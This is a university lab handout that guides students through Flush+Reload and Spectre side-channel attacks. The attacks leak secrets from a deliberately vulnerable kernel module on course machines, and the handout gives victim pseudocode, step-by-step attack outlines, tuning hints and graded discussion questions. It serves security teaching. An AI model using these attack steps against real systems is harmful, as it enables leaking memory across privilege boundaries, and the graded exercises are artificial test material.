Spectre Attacks Lab

Due Date: Mar 21; Last Updated Date: Feb 14

Introduction
Part 0: Lab Infrastructure
Part 1: Leaking Kernel Memory via Flush+Reload (35%)
Part 2: Basic Spectre (40%)
Part 3: Advanced Spectre (25%)
Behind the Scene: How this lab infrastructure was developed?

Collaboration Policy

Our full Academic Honesty policy can be found on the Course Information page of our website. As a reminder, all 6.5950/6.5951 labs should be completed individually. You may discuss the lab at a high level with a classmate, but you may not work on code together or share any of your code.

Getting Started

Log into your assigned machine. Your credentials and machine information have been emailed to you. It will be one of the arch-sec-[1-4].csail.mit.edu machines. To connect via ssh, run ssh username@arch-sec-X.csail.mit.edu.

We are using git for all the labs – instructions for setting up the git repository can be found on the labs page.

In addition to submitting code, you are required to submit a PDF lab report containing your answers to Discussion Questions to gradescope. We provide a markdown template in the starter code (report.md).

Introduction

In this lab, you will complete the following tasks:

Understand how Spectre works across privilege boundaries.
Solve three CTF (capture-the-flag) puzzles with increasing difficulty levels. You will start with implementing the basic Spectre attack. We will then test your understanding of how hardware works by challenging you to implement an advanced Spectre in the last part of this lab.

Part 0: Lab Infrastructure

Interacting with Linux Kernel

The highlight of this lab is that you will implement your own version of the famous Spectre attack and use it to leak secrets from the Linux kernel, across privilege boundaries. It presents a good opportunity for you to understand the existing technique used to isolate kernelspace from userspace.

Our virtual address space is divided into the kernelspace and the userspace. Unprivileged application code resides in the userspace as shown in the figure below. There are several restrictions on the userspace code. The userspace code cannot directly access kernelspace data or directly branch into the kernelspace and execute kernel code. For example, the load 0xABCD (a kernelspace virtual address) operation will trigger a page permission check failure, or segmentation fault as reported when running a C program. Similarly, executing the instruction jump 0x1234 will also panic with a segmentation fault.

So how can the userspace code interact with the kernelspace and still ensure privilege isolation? The right way is to use kernelspace exposed API interface. When calling a correct kernelspace API, the code jumps to the kernelspace entrypoint (the only place in the kernel allows transition from userspace). The entrypoint code performs tons of work for context switch and then jumps to the requested API function.

In our lab infrastructure, we provide a custom Linux kernel module (blue box) sitting in the kernelspace. This kernel module provided a limited interface for userspace code to call into. The module is embedded with vulnerable Spectre gadgets, operates on some secret data (red box), and uses secret data as addresses to access the shared buffer (green box). Read the section at the end of this handout for more details about how the lab infrastructure is designed. Obviously, your code, residing in the userspace, will not be able to directly access the secret buffer in the kernelspace. Fortunately, we know that the kernelspace and userspace code, when they execute, share all the microarchitectural structures.

Lab Infrastructure Setup

The Secret

The secret in each part is a string of the form MIT{some_secret_value}. The string can be up to 64 bytes, including the NULL terminator. You can consider the secret complete once you leak the NULL terminator.

The characters in the string may NOT be printable ASCII. Your code should be able to leak arbitrary 8-bit secrets byte by byte.

Do not make any assumption about the secret other than it is a NULL terminated string of length up to 64 bytes (including the NULL terminator). The secrets will not change from run to run (they are constant for the lifetime of the kernel module). During grading, we may use different secret values to evaluate your implementation.

Code Skeleton

inc/labspectre.h and src-common/spectre_lab_helper.c provide a set of utility functions for you to use.
src-common/main.c is used in all three parts. The main function sets up a shared memory region (shared_memory corresponding to the green box in the figure above) of size SHD_SPECTRE_LAB_SHARED_MEMORY_SIZE bytes, which is shared between the userspace and kernel. It also sets up a file descriptor for communicating with the kernel module. The technique behind this communication is called procfs write handling, detailed in the section at the end of this handout.
inc/labspectreipc.h contains bindings for the interface to the kernel module from userspace. You do not need to understand this, as our provided code handles the communication with the kernel.
part1-src/attacker-part1.c is the file you will modify in Part 1. The method call_kernel_part1 can be used for calling into the kernel module. The code for Part2 and Part 3 follow the exact same pattern.

Compile, Test, and Autograde

This lab will be autograded. After you hand in your code, we will embed different secret strings in the kernel and rerun your code to see whether it effectively leaks these strings. If your code works reliably with the autograder, you should expect no surprise with your grades. Instructions for compiling the code and running the autograder are below.

From the root directory, use make to compile the project. The binaries part[1-3] will be produced in the same directory (run them by calling ./part[1-3]. The results of your code will be printed to the console – on success you should see the secret leaked from kernel memory printed to the console.

An example of the expected output is below:

$ ./part1
MIT{part1_secret_value}

You can invoke the autograder with ./check.py X, where X is the part to check.

An example of the expected output is below:

$ ./check.py 1
Checking part 1 ...
You passed 950 of 1000 runs (95.0%)
Success! Good job

You can check all parts at once with make and then ./check.py all

Part 1: Leaking Kernel Memory via Flush+Reload (35%)

In this part you will set up a cache-based side channel to leak information from the kernel using Flush+Reload.

Get to Know the Victim

The pseudocode for the kernel victim code of Part 1 is shown below.

def victim_part1(shared_mem, offset):
    secret_data = part1_secret[offset]
    load shared_mem[4096 * secret_data]

The victim function takes a pointer shared_mem and an integer offset as input. Both variables are passed from the userspace and determined by the attacker, e.g., you. The variable shared_mem points to the starting of the shared memory region, the green box in the figure above.

First, the code loads a secret byte from a secret array named part1_secret, located inside kernelspace. The byte to leak is chosen by the attacker-controlled offset. When the offset is 0, the first secret byte will be loaded; when offset is 1, the second byte will be loaded, and so on. Next, the victim multiplies the secret byte with 4096 and uses the result as an index into the shared memory array. For example, if the secret data was the character ‘A’ (0x41), then the first cache line of the 0x41’th page in the shared memory region will be loaded into the cache.

Your Attack Plan

Recall that the secret is a string up to 64 characters long (including the NULL terminator). The attacker can leak the secret one byte at a time using Flush+Reload. Reuse your attack strategy from the Part 2 in the cache lab here, with the only difference at step 1, that is, the attacker needs to call the victim code to perform the secret-dependent memory access. Without losing generality, we summarize the attack outline for you below.

Flush the memory region from the cache using clflush.
Call the victim method using the desired offset to leak the secret byte.
Reload the memory region, measure the latency of accessing each address, and use the latency to derive the value of the secret. When the value is 0x00 (i.e. NULL), the attack is complete.

1-1 Discussion Question

Given the attack plan above, how many addresses need to be flushed in the first step?

Allowed Code

You can define your own helper methods as you desire. You can use any method in inc/labspectre.h as well as the provided methods in part1-src/attacker-part1.c.

You should only use the provided call_kernel_part1 method to interact with the kernel module. This function takes three arguments: a file descriptor to the kernel module, a pointer to the shared memory region, and an offset. kernel_fd and shared_memory can be directly passed to this method without modification. The offset for a given invocation is up to you.

Build your attack step-by-step: start by leaking one character first, then try to leak the whole string.

1-2 Exercise

Implement the Flush+Reload attack in part1-src/attacker-part1.c to leak the secret string. Build the project with make and run ./part1 from the main directory to see if you get the secret. Run ./check.py 1 from the main directory to repeat the experiment multiple (5 by defualt) times.

Submission and Grading

Submit your code part1-src/attacker-part1.c to your assigned Github repo. Full credit will be awarded to solutions that report the correct secret at least 80% of the time, while partial credit will be awarded for solutions which perform worse than that. Each attempt (i.e., each run of ./part1) should take no longer than 30 seconds.

Part 2: Basic Spectre (40%)

Now that Flush+Reload is working, let’s move on to actually implementing a Spectre attack!

Get to Know the Victim

Below is the pseudocode for Part 2’s victim code. This victim is quite similar to Part 1, except it will only perform the load if the offset is within a specific range (e.g., offset<4).

part2_limit = 4
def victim_part2 (shared_mem, offset):
    secret_data = part2_secret[offset]
    mem_index = 4096 * secret_data

    # to delay the subsequent branch
    flush(part2_limit)

    if offset < part2_limit:
        load shared_mem[mem_index]    

2-1 Discussion Question

Copy your code in run_attacker from attacker-part1.c to attacker-part2.c. Does your Flush+Reload attack from Part 1 still work? Why or why not?

Attack Outline

Below are the steps required to leak a single byte. You may need to alter your approach to account for system noise.

Train the branch predictor to speculatively perform the load operation (i.e., take the branch).
Flush the shared memory region from the cache using clflush.
Call the victim function with an offset beyond the limit, leaking the secret byte during speculative execution.
Reload the memory region, measure the latency of accessing each address, and use the latency to determine the value of the secret.

As you’ve observed in previous labs, side channel attacks generally do not work on the first attempt. You should try to use the good practices you have learned from the cache lab when attempting for any microarchitectural attacks. For example,

DO NOT measure while printing.

To improve attack precision, you can repeat measurements multiple times and use statistical methods to decode secret.

Try to avoid using systemcall-related functions during attack. Both the printf and sleep functions trigger enough noise to seriously destruct your cache state and your branch predictor state.

In addition, here is one more hint specific to the branch predictor. Modern processors employ branch predictors with significant complexity. Branch predictors can use global prediction histories, which allow different branches to interfere each other. Besides, the branch predictor is shared between userspace and kernel space. If the speculation is not working as expected, you may need to reduce the number of branches in your attack code.

2-2 Exercise

Implement the Spectre attack in attacker-part2.c to leak the secret string. Build the project with make and run ./part2 to see if you get the secret. Run ./check.py 2 to repeat the experiment multiple (5 by defualt) times.

2-3 Discussion Question

In our example, the attacker tries to leak the values in the array secret_part2. In a real-world attack, attackers can use Spectre to leak data located in an arbitrary address in the victim’s space. Explain how an attacker can achieve such leakage.

2-4 Discussion Question

Experiment with how often you train the branch predictor. What is the minimum number of times you need to train the branch (i.e. if offset < part2_limit) to make the attack work?

Submission and Grading

This part is graded in the same way as Part 1. Full credit will be awarded to solutions that report the correct secret at least 80% of the time, while partial credit will be awarded for solutions which perform worse than that. Each attempt (i.e., each run of ./part2) should take no longer than 30 seconds.

Part 3: Advanced Spectre (25%)

Now that we’ve got our Spectre attack working, let’s try a harder version of the same problem.

Get to Know the Victim

Below is the pseudocode for Part 3:

part3_limit = 4
def victim_part3 (shared_mem, offset):
    if offset < part3_limit:
        false_dependency = lengthy computation # the computation result is 0
        secret_data = part3_secret[offset]
        mem_index = 4096 * secret_data
        load shared_mem[mem_index + false_dependency]

There are two key differences in the victim code compared to Part 2. First, the victim no longer flushes the limit variable (partX_limit) before the branch. Second, we have added a false dependency before the memory access, making the memory access start later in the speculation window.

If you copy run_attacker from Part 2, you should see that your attack does not work with the new victim. This is because in the modified victim code, the memory access instruction we try to monitor may not be issued speculatively for three reasons:

The speculation window becomes shorter. The speculation window starts at the cycle the branch (if offset < part3_limit) enters the processor, and ends at the cycle when the branch condition is resolved. If the part3_limit variable is cached, it will take a very short time to obtain its value, detect it is a branch misprediction, and squash the instructions after this branch. As a result, the speculative window becomes shorter.
The issue time of the secret-dependent memory access is delayed. Due to the data dependency between the false_dependency line and the load shared_mem line, the secret-dependent memory access can only be issued after the variable false_dependency is computed. It is possible that the branch condition is resolved before the speculative load even executes.
There is a hidden source of timing delay due to TLB misses. Feel free to refer to the section at the end of this handout for more information. You do not need to understand this factor for making your attack work.

To make your attack work, you will need to find a way to increase the speculation window such that the speculative load has a higher chance of occuring. Note that you cannot change the long latency memory address dependency. Similar as before, use the good practices for microarchitectural attacks: do not use systemcall-related functions during attack, such as printf and sleep.

Note

If your implementation from Part 2 can pass the test for Part 3, congratulations and please reach out to us! We have designed this part to make basic Spectre attack implementations work ineffectively, and we’d be curious to learn how you made it work in one shot.

3-1 Exercise

Optimize the attack in attacker-part3.c to leak the secret string. Build the project with make and run ./part3 to see if you get the secret. Run ./check.py 3 to repeat the experiment multiple (5 by defualt) times.

3-2 Discussion Question

Describe the strategy you employed to extend the speculation window of the target branch in the victim.

3-3 Discussion Question

Assume you are an attacker looking to exploit a new machine that has the same kernel module installed as the one we attacked in this part. What information would you need to know about this new machine to port your attack? Could it be possible to determine this information experimentally? Briefly describe in 5 sentences or less.

Submission and Grading

Full credit will be awarded to solutions that report the correct secret at least 20% of the time, while partial credit will be awarded for solutions which perform worse than that. Each attempt (i.e., each run of ./part3) should take no longer than 10 minutes. We will give partial credit if the attack can recover some part of the secret string.

You can check all parts at once with make and then ./check.py all

As always, do not forget to include answers to the discussion questions in your lab report and submit the report to gradescope.

Behind the Scene: How this lab infrastructure was developed?

For those who are curious, here is a brief description of how this lab infrastructure was developped. The victims you are interacting with are part of a custom kernel module. You can find the source code of this kernel module in module-src/labspectrekm.c. The communication between the userspace and the kernel module is handled using a technique called procfs write handling. Specifically, whenever the userspace code writes to a file (i.e., /proc/labspectre-victim), a procfs write handler (i.e., spectre_lab_victim_write function in module-src/labspectrekm.c) in the kernel module will start to execute, using the written data (i.e., the local_cmd variable in call_kernel_partX functions) as the userbuf arguments.

On the lab machine, SMAP (supervisor mode access prevention) and SMEP (supervisor mode execution prevention) are both on, which means that the kernel cannot directly read or execute userspace memory. You may wonder, in this case, how the kernel can read the shared_mem array, which is located in userspace. This is done by temporarily remapping an alias of the shared memory region into the kernel space. What we end up with is two different virtual addresses, one in the userspace and one the kernel space, both mapping to the same physical address. This is similar to what we have seen in Part 2 of the cache lab, where two virtual addresses in two processes are mapped to the same physical address.

The interaction between the kernel module and the userspace code involves context switches. When the userspace code calls the kernel module (via the write syscall), the processor transitions from the userspace to the kernelspace, which will flush some microarchitecture structures, such as TLBs. The custom kernel module will then create an alias mapping for the shared memory region and execute the requested function. Before returning to the userspace, it will unmap the shared region. Therefore, every time the kernel module is called, the first accesses to each page will incur TLB misses. In Parts 2, we deliberately prevent TLB misses to make your attack easier by forcing page walks before performing any secret-dependent memory accesses. In Part 3, these redundant accesses are removed. You will need to craft an advanced Spectre attack that can succeed despite the added latency due to TLB misses. So in Part 3, in addition to the false dependency, the TLB misses also contribute to the extra latency.

Acknowledgements

Contributors: Joseph Ravichandran, Mengjia Yan, Peter Deutsch.

Spectre Attacks Lab

Table of Contents

Collaboration Policy

Getting Started

Introduction

Part 0: Lab Infrastructure

Interacting with Linux Kernel

The Secret

Code Skeleton

Compile, Test, and Autograde

Part 1: Leaking Kernel Memory via Flush+Reload (35%)

Get to Know the Victim

Your Attack Plan

Allowed Code

Submission and Grading

Part 2: Basic Spectre (40%)

Get to Know the Victim

Attack Outline

Submission and Grading

Part 3: Advanced Spectre (25%)

Get to Know the Victim

Submission and Grading

Behind the Scene: How this lab infrastructure was developed?

Acknowledgements